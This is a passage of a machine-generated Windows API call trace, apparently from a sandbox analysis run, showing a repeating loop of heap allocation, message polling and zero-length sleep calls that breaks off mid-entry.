[0273.869] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.869] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.869] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.869] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.869] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.869] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.869] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.869] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.869] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.869] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.869] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.869] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.869] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.869] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.869] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.869] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.869] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.869] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.869] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.869] Sleep (dwMilliseconds=0x0) [0273.869] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.869] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.869] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.869] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.869] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.869] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.870] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.870] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.870] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.870] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.870] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.870] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.870] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.870] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.870] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.870] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.870] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.870] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.870] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.870] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.870] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.870] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.870] Sleep (dwMilliseconds=0x0) [0273.870] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.870] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.870] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.870] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.870] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.870] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.870] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.870] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.870] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.871] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.871] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.871] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.871] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.871] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.871] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.871] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.871] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.871] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.871] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.871] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.871] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.871] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.871] Sleep (dwMilliseconds=0x0) [0273.871] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.871] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.871] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.871] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.871] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.871] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.871] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.871] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.871] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.871] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.871] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.871] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.872] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.872] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.872] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.872] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.872] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.872] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.872] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.872] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.872] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.872] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.872] Sleep (dwMilliseconds=0x0) [0273.872] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.872] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.872] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.872] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.872] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.872] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.872] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.872] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.872] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.872] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.872] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.872] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.872] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.872] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.872] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.872] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.873] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.873] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.873] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.873] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.873] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.873] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.873] Sleep (dwMilliseconds=0x0) [0273.873] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.873] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.873] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.873] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.873] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.873] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.873] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.873] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.873] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.873] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.873] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.873] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.873] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.873] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.873] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.873] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.873] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.873] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.873] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.874] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.874] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.874] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.874] Sleep (dwMilliseconds=0x0) [0273.874] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.874] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.874] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.874] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.874] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.874] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.874] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.874] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.874] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.874] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.874] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.874] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.874] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.874] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.874] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.874] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.874] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.874] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.874] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.874] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.874] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.875] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.875] Sleep (dwMilliseconds=0x0) [0273.875] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.875] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.875] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.875] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.875] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.875] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.875] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.875] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.875] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.875] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.875] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.875] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.875] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.875] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.875] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.875] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.875] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.875] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.875] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.875] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.875] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.875] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.875] Sleep (dwMilliseconds=0x0) [0273.875] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.876] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.876] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.876] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.876] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.876] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.876] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.876] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.876] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.876] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.876] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.876] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.876] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.876] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.876] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.876] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.876] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.876] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.876] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.876] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.876] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.876] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.876] Sleep (dwMilliseconds=0x0) [0273.876] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.876] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.876] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.876] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.877] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.877] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.877] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.877] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.877] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.877] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.877] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.877] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.877] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.877] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.877] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.877] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.877] RtlAllocateHeap 